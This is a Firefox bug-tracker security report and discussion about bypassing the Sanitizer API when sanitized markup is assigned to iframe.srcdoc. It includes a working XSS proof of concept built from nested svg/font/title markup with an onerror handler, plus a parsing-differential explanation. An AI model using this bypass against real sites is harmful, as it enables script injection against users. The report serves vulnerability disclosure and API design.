Sanitizer bypass if the sanitized markup is assigned to srcdoc
Categories
(Core :: DOM: Security, defect, P2)
Tracking
()
People
(Reporter: michal.bentkowski, Assigned: freddy)
References
(Depends on 1 open bug, Blocks 1 open bug)
Details
(Keywords: reporter-external, sec-moderate, Whiteboard: [reporter-external] [client-bounty-form][domsecurity-active])
I've found a bug in Firefox sanitizer that can be exploited if the result of sanitizeToString
is used in a sink that doesn't parse the HTML using fragment parsing algorithm (examples being: iframe.srcdoc
, data:text/html,markup
etc.)
Proof of concept
Here's the proof-of-concept:
<iframe id=ifr></iframe>
<script>
const bypass = `<svg><font color><title><u rel="</title><img src onerror=alert(document.domain)>">`;
ifr.srcdoc = new Sanitizer().sanitizeToString(bypass);
</script>
Make sure to test on Firefox Nightly. An alert
is shown despite using the sanitizer.
Explanation
There's an interesting difference in HTML parsing in HTML spec between fragment parsing algorithm and document parsing algorithm in foreign content.
Suppose we have the following markup:
<svg><p>Test
If we use document parsing algorithm (via srcdoc
for instance), it creates the following DOM tree:
├ <svg svg>
└ <html p>
(I'm using a notation that tag name is prepended with a namespace name)
On the other hand, if we use fragment parsing algorithm (via innerHTML
), it creates the following DOM tree:
└ <svg svg>
└ <svg p>
This is correct per HTML spec and rules of parsing tokens in foreign content (however, interestingly, Chrome parses both cases the same way).
According to the specification, if the parses is in document parsing mode, then certain tokens (<p>
included) "escape" the foreign content. The same doesn't happen in fragment parsing.
Another interesting tag that "escapes" foreign content is <font>
because it does so only if it has any attributes named color
, face
or size
.
So in document parsing mode the markup <svg><font>
creates svg font
, while <svg><font face>
creates html font
.
Now consider the following markup (that was the bypass):
<svg>
<font color>
<title>
<u rel="</title>
<img src onerror=alert(document.domain)>">
Internally, Firefox sanitizer makes use of fragment parsing algorithm. This means that the markup is parsed into the following DOM tree:
└ <svg svg>
└ <svg font color="">
└ <svg title>
└ <html u rel="</title><img src onerror=alert(1)>">
All of these elements and attributes are allow-listed by the sanitizer. When authors use sanitizeToString
, the markup is serialized to:
<svg>
<font color="">
<title>
<u rel="</title>
<img src onerror=alert(document.domain)>"></u></title></font></svg>
Now, when this result is assigned to srcdoc
(or other places with document parsing mode), it is parsed into the following DOM tree:
├ <svg svg>
└ <html font color="">
├ <html title>
│ └ #text: <u rel="
├ <html img src="" onerror="alert(document.domain)"/>
└ #text: ">
So because of the difference in parsing between document and fragment, <font color>
"escaped" foreign content and thus title
is now parsed in HTML namespace, not in SVG namespace, which means that it is closed on first instance of </title>
leading to the bypass.
Assignee | ||
Updated•4 years ago
|
Assignee | ||
Comment 1•4 years ago
|
||
OK, this is a real shortcoming of the API. Currently, we can't tell if the result is going to be re-parsed using a document parser or the fragment parser.
This could all be avoided for fragments only if developers avoided the re-parsing roundtrip by just using the API bits that return a DocumentFragment like domElement.append(sanitize())
. That won't help the document parsing case though.
Makes me wonder if we need to re-evaluate the API and enforce a combination of Sanitization + DOM insertion.
I'm making stuff up here, but an example would be domNode.appendSanitized(dirty)
and newSanitizedDocument(dirty)
.
That would rid us off sanitization options, which we are currently holding using the constructor pattern in new Sanitizer
.
Ugh. :)
There's a very relevant spec discussion in https://github.com/WICG/sanitizer-api/issues/37 btw.
Reporter | ||
Comment 2•4 years ago
|
||
Maybe we should think about adjusting the spec? I have no idea why the distinction between fragment and non-fragment exists in the specification in the first place (maybe someone will greater knowledge will let us know) but I do believe that it shouldn't exist.
Case in point: both Safari and Chromium parses foreign content the same way no matter if it's a fragment or not (it's parsed as if it wasn't a fragment) so they ignore this part of the spec.
Reporter | ||
Comment 4•4 years ago
|
||
I realized that there's already a spec issue about it: https://github.com/whatwg/html/issues/5117
Comment 5•4 years ago
|
||
Freddy: although the DOM API is a new way to reach the sanitizer, is this likely to be actually the same underlying problem as bug 1666300 and that whole cluster?
Updated•4 years ago
|
Assignee | ||
Comment 6•4 years ago
|
||
No, this is tied to another problem.
The issue here is more of a parsing/serialization quirk. The sanitizer is creating a string to be consumed by a fragment parser, but the .srcdoc
assignment is using a document parser instead.
Updated•4 years ago
|
Assignee | ||
Comment 7•4 years ago
|
||
I don't think I can solve this without our HTML parser aligning with WebKit & Blink. Anne says, this ought to be happening, but priorities are unclear. I'm poking their team lead.
Updated•4 years ago
|
Comment 8•3 years ago
|
||
Freddy, is it now time to make the change (https://bugzilla.mozilla.org/show_bug.cgi?id=1205631#c28) :) ?
Assignee | ||
Comment 9•3 years ago
|
||
This has been super valuable report, but instead of fixing this single bug we are fixing this issue by changing the whole API.
i.e., there just isn't going to be a sanitize()
function that accepts a html string without contextual parsing anymore.
The decision came out of standards discussions in https://github.com/WICG/sanitizer-api/issues/42
I think we can mark this as WONTFIX. Work on the new API shall happen in another bug, which I will link to shortly.
Assignee | ||
Comment 10•3 years ago
|
||
Reporter | ||
Comment 11•3 years ago
|
||
(In reply to Frederik Braun [:freddy] from comment #9)
This has been super valuable report, but instead of fixing this single bug we are fixing this issue by changing the whole API.
i.e., there just isn't going to be asanitize()
function that accepts a html string without contextual parsing anymore.
The decision came out of standards discussions in https://github.com/WICG/sanitizer-api/issues/42I think we can mark this as WONTFIX. Work on the new API shall happen in another bug, which I will link to shortly.
So could we open this bug? I think it'll be a useful reference point in certain discussions about Sanitizer API.
Assignee | ||
Comment 12•3 years ago
|
||
Yes, I agree it would be a useful reference.
Dan, are you OK with opening this up?
The issue is still unfixed but the sanitizer is also behind a pref..
Comment 13•3 years ago
|
||
As per comment 4 it seems to me this is really a duplicate of bug 1205631. The API change wouldn't really help with this and there might still be differences between document and fragment parsing that could be exploited in this way. Hard to say until someone does a formal proof of sorts.
Assignee | ||
Comment 14•3 years ago
|
||
Really? But the new API pushes back n the notion of a context-free parser.
The sanitizeFor or setSanitizedHTML (naming TBD) functions wouldn't accept the srcdoc usecase explained here.
(That is unless we hack various other use cases into the sanitizeFor function, i.e., not just accepting element names as the context node for a fragment parser but also things like a 'document' or 'srcdoc' parameter, that invokes a totally different parameter. But that seems odd, to say the least.)
For this specific issue here, I'm hoping people would use the sanitize() function (that operates on a fragment or a document) instead.
I acknowledge it might be far fetched to just expect everyone using the right parser..
Comment 15•3 years ago
|
||
I think it's fair to say that no longer exposing a serializer helps a lot in terms of guiding people toward avoiding this pitfall.
Updated•3 years ago
|
Updated•6 months ago
|
Description
•